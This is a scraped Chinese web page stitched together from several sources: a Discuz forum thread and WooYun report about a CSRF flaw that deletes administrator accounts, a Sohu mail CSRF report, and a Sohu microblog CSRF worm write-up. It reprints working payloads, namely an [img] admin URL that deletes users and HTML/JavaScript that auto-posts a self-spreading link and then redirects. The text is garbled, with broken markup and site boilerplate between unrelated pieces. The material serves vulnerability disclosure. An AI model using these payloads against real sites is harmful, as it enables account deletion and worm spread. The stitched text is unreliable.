csrf攻击(100046) 怎么修复

跨站点脚本 (XSS) 和跨站点请求伪造 (CSRF)_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
评价文档:
跨站点脚本 (XSS) 和跨站点请求伪造 (CSRF)|
把文档贴到Blog、BBS或个人站等:
普通尺寸(450*500pix)
较大尺寸(630*500pix)
你可能喜欢查看: 1302|回复: 4
问一下x3.2是否修复了CSRF删管理员账号漏洞
& & x3.2是否修复了CSRF删管理员账号漏洞
[img]admin.php?frame=no&action=members&operation=clean&submit=1&uidarray=1&confirmed=yes[/img]复制代码
其中修改uidarray可以删除多个指定用户
被删除后的管理员会强制退出登陆,重新登录后会提示ucenter激活(discuz数据库内的用户已被删除),激活后丢失管理权
上述代码稍加修改可在删除同时清空发帖数据,这么危险的漏洞在x3.2有没有修复呢
我去&&难道沉了&&有没有人知道啊&&回一个啊
自己搭建一个测试站点试试
这不是漏洞
沒有笨蛋站长会让其它人用CSRF方式删管理员账号吧
后台已可批量删除用户&&连UC数据删除
更沒必要修改uidarray
以下信息来自乌云:http://www.wooyun.org/bugs/wooyun-漏洞概要
缺陷编号: WooYun-
漏洞标题: Discuz! X2.5 / X3 / X3.1 可CSRF删管理员账号
相关厂商: Discuz!
漏洞作者: kookxiang
提交时间:
公开时间:
漏洞类型: 设计缺陷/逻辑错误危害
自评Rank: 15
漏洞状态: 厂商已经确认
漏洞来源: http://www.wooyun.org披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:接着上次的漏洞来……详细说明:上次那个漏洞: WooYun: Discuz! X2.5 / X3 / X3.1中CSRF攻击防御可被绕过
你们回复说是程序员认为不需要校验才这么设置……那这回应该算是你设计问题了吧
后台删除用户页面只是单纯做了submitcheck('submit', 1),按之前的说明,程序这里没有判断formhash,也就是说可以用于CSRF
不过利用这个漏洞前提是要管理员登陆了后台,不过这个不会很麻烦吧(比如故意加点关键字进审核然后让管理员触发神马的,实在不行还能发帖钓鱼) 漏洞证明:发帖插入 Discuz! 代码:[img]admin.php?frame=no&action=members&operation=clean&submit=1&uidarray=1&confirmed=yes[/img]复制代码
其中修改uidarray可以删除多个指定用户
被删除后的管理员会强制退出登陆,重新登录后会提示ucenter激活(discuz数据库内的用户已被删除),激活后丢失管理权
上述代码稍加修改可在删除同时清空发帖数据,太危险了我也不敢试…… 修复方案:formhash判断 版权声明:转载请注明来源 kookxiang@乌云漏洞回应厂商回应:危害等级:高漏洞Rank:20 确认时间: 15:17厂商回复:我们尽快修复,谢谢最新状态:暂无
Powered bysohu邮箱csrf 可转发用户邮件及修改用户信息等
sohu邮箱基本未做csrf防御,只要发送一封邮件给用户,用户要是点了里面的链接,任人折腾了哦。。
问题存在多处,我就随便拿一处举例了。
在证明中,我把用户的所有邮件转发垤指定的邮箱中去,这破坏超大吧?
发封html邮件给要攻击的人
因为sohu只认post请求,所以构建一个外站链接,由外站发起post请求
点了邮件中的链接后
来看看外站内容
bingo! 战果
修复方案:
csrf常规处理了,你们会的。 如果改动比较大,那起码检测一下referer。
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架,或者当前配置为不显示嵌入式框架。搜狐CSRF实例一:让蠕虫来得更猛烈些
我们这次来看看如何利用纯CSRF来实现蠕虫攻击。
问题URL: /a/app/mblog/save.htm?_input_encode=UTF-8 可CSRF发微博。下面来看看怎么利用&
通过上面的URL我构造了一个payload ,打开后先POST一条微博,然后等5秒跳转到指定地址。
&meta http-equiv=&content-type& content=&text/;charset=utf-8&&
&h1&正在跳转...&/h1&
&iframe id=&test_iframe& src=&/& style='display:none'&
function CSRF()
test_iframe.document.write(&&form id='test_form' action='/a/app/mblog/save.htm?_input_encode=UTF-8' method='post' &&
+&&input type='hidden'
name='content' value='荐一个好东西 http://cnhk.ml/souhu/send.html'&&
+&&input type='hidden'
name='type' value='0'&&
+&&input type='hidden'
name='from' value='sentence'&&
+&&input type='hidden'
name='url' value=''&&
+&&/form&&
+&&script&document.getElementById('test_form').submit();&\/script&&
window.setTimeout(&window.location.href='http://threejs.org/'&, 5000); //延迟5秒后跳转到指定网页
POST的内容为
荐一个好东西 http://cnhk.ml/souhu/send.html
这样就构成了一个CSRF蠕虫
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&
您的浏览器不支持嵌入式框架,或者当前配置为不显示嵌入式框架。}

我要回帖

更多关于 django csrf 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信